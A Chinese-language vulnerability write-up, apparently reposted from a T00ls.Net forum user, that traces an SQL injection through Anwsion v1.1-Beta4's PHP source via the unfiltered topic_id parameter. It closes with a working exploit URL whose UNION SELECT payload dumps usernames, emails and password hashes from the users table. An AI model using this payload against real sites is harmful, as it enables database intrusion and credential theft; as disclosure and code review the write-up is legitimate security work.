因为耶稣的3hack是用的此程序, 答应了帮忙读读的, 但是限于一直没时间, 正好昨晚有时间就马上粗略的看了下
代码写的很规范, 对于我这种半路出家的人来说看着有点吃力, 尤其是对url参数的各种处理和分割, 很像国外程序的写法.. 看着很蛋疼!!
但是相较于我以前看的Typecho和TextCUBE等就要简单许多了 那俩活爹写法更扯淡 o(∩_∩)o ~
好了不废话了, 上代码: \app\home\main.php(85):
public function explore_action()
{
// 省略........... By.Rices -> Forum: T00ls.Net -> Blog: Rices.so
if ($_GET['category'])
{
if (is_numeric($_GET['category'])) //据说以前这里也可以注射 所以被isnum了..
{
$category_info = $this->model('system')->get_category_info($_GET['category']);
}
/*
省略......
*/
// 注射开始! By.Rices -> Forum: T00ls.Net -> Blog: Rices.so
if (TPL::is_output('block/content_question.tpl.htm', 'home/explore'))
{
if (! $_GET['sort_type'])
{
$_GET['sort_type'] = 'new';
}
if ($_GET['sort_type'] == 'unresponsive')
{
$_GET['answer_count'] = '0';
}
$question_list = $this->model('question')->get_questions_list($_GET['page'], get_setting('contents_per_page'), $_GET['sort_type'], $_GET['topic_id'], $this->user_id, $category_info['id'], $_GET['answer_count'], $_GET['day']);
//$_GET['topic_id']直接带入了 fvck.fvck! By.Rices -> Forum: T00ls.Net -> Blog: Rices.so
TPL::assign('question_list', $question_list);
TPL::assign('question_list_bit', TPL::output('question/ajax/list', false));
// 省略.... HdhCmsTest2cto测试数据
继续追$this->model(‘question’)->get_questions_list函数, \models\question.php(63):
public function get_questions_list($page = 1, $pre_page = 10, $sort = 'hot', $topic_id = 0, $uid = null, $category_id = null, $answer_count = null, $day = 30)
{
$uid = intval($uid);
$user_id_list = array();
$user_info_list = array();
$user_list = array();
$question_info_list = array();
$question_list = array();
$limit = calc_page_limit($page, $pre_page);
if ($sort == 'hot')
{
$question_info_list = $this->get_hot_question($category_id, $topic_id, $limit, $day);
//继续带入$topic_id By.Rices -> Forum: T00ls.Net -> Blog: Rices.so
}
//省略...... By.Rices -> Forum: T00ls.Net -> Blog: Rices.so
再追get_hot_question函数, \models\question.php(216):
?View Code PHP
public function get_hot_question($category_id = 0, $topic_id = null, $limit = '0, 10', $day = 30)
{
$day = intval($day);
if (!$day)
{
$add_time = '0';
}
else if ($day == 1)
{
$add_time = strtotime('-1 day');
}
else
{
$add_time = strtotime('-' . $day . 'day');
}
if ($category_id)
{
$question_all = $this->fetch_all('question', "add_time > " . $add_time . " AND focus_count > 0 AND agree_count > 0 AND answer_count > 0 AND category_id IN(" . implode(',', $this->model('system')->get_category_with_child_ids('question', $category_id)) . ')');
}
else if ($topic_id)// 开始了
{
$topic_ids = array();
if (is_array($topic_id))
{
$topic_ids = $topic_id;
}
else
{
$topic_ids[] = $topic_id;
}
//无任何过滤 又带入了get_question_ids_by_topics_ids函数 By.Rices -> Forum: T00ls.Net -> Blog: Rices.so
if ($question_ids = $this->model('topic')->get_question_ids_by_topics_ids($topic_ids, 10, null, 'question_id DESC'))
{
$question_all = $this->fetch_all('question', "add_time > " . $add_time . " AND question_id IN(" . implode(',', $question_ids) . ')', 'popular_value DESC', $limit);
}
}
else
{
$question_all = $this->fetch_all('question', 'add_time > ' . $add_time, 'popular_value DESC', $limit);
}
return $question_all;
}
最终在get_question_ids_by_topics_ids函数进入数据库了 o(∩_∩)o~~ \models\topic.php(693):
?View Code PHP
function get_question_ids_by_topics_ids($topic_ids, $limit, $where = null, $order = 'update_time DESC')
{
if (!is_array($topic_ids))
{
$topic_id_in = $topic_ids;
}
else
{
$topic_id_in = implode(',', $topic_ids);
}
if ($where)
{
$where = ' AND ' . $where;
}
$_order = explode(' ', $order);
if (!$where AND $_order[0] == 'question_id')
{
$result = $this->query_all("SELECT question_id FROM " . $this->get_table('topic_question') . " WHERE topic_id IN (" . $topic_id_in . ") ORDER BY " . $order, $limit);
// 直接入库执行了, 注射产生~~ By.Rices -> Forum: T00ls.Net -> Blog: Rices.so
}
else
{ //省略....
先丢个exp吧:
http://HdhCmsTest2cto测试数据 /?/home/explore/category?sort_type-hot__answer_count-1__day-1__topic_id-55)%20and%201=2%20union%20select%20concat%28(select%20concat(user_name,0x2D3E,email,0x2D3E,password)%20from%20aws_users%20limit%200,1)%29%23
这程序我看很多人都是直接黑盒的, 可能大 黑客 们都嫌麻烦吧, 类似的注射还有, 就不多发了, 此程序极其不安全, 外强中干! over~
查看更多关于Anwsion(v1.1-Beta4) 注入漏洞 - 网站安全 - 自学php的详细内容...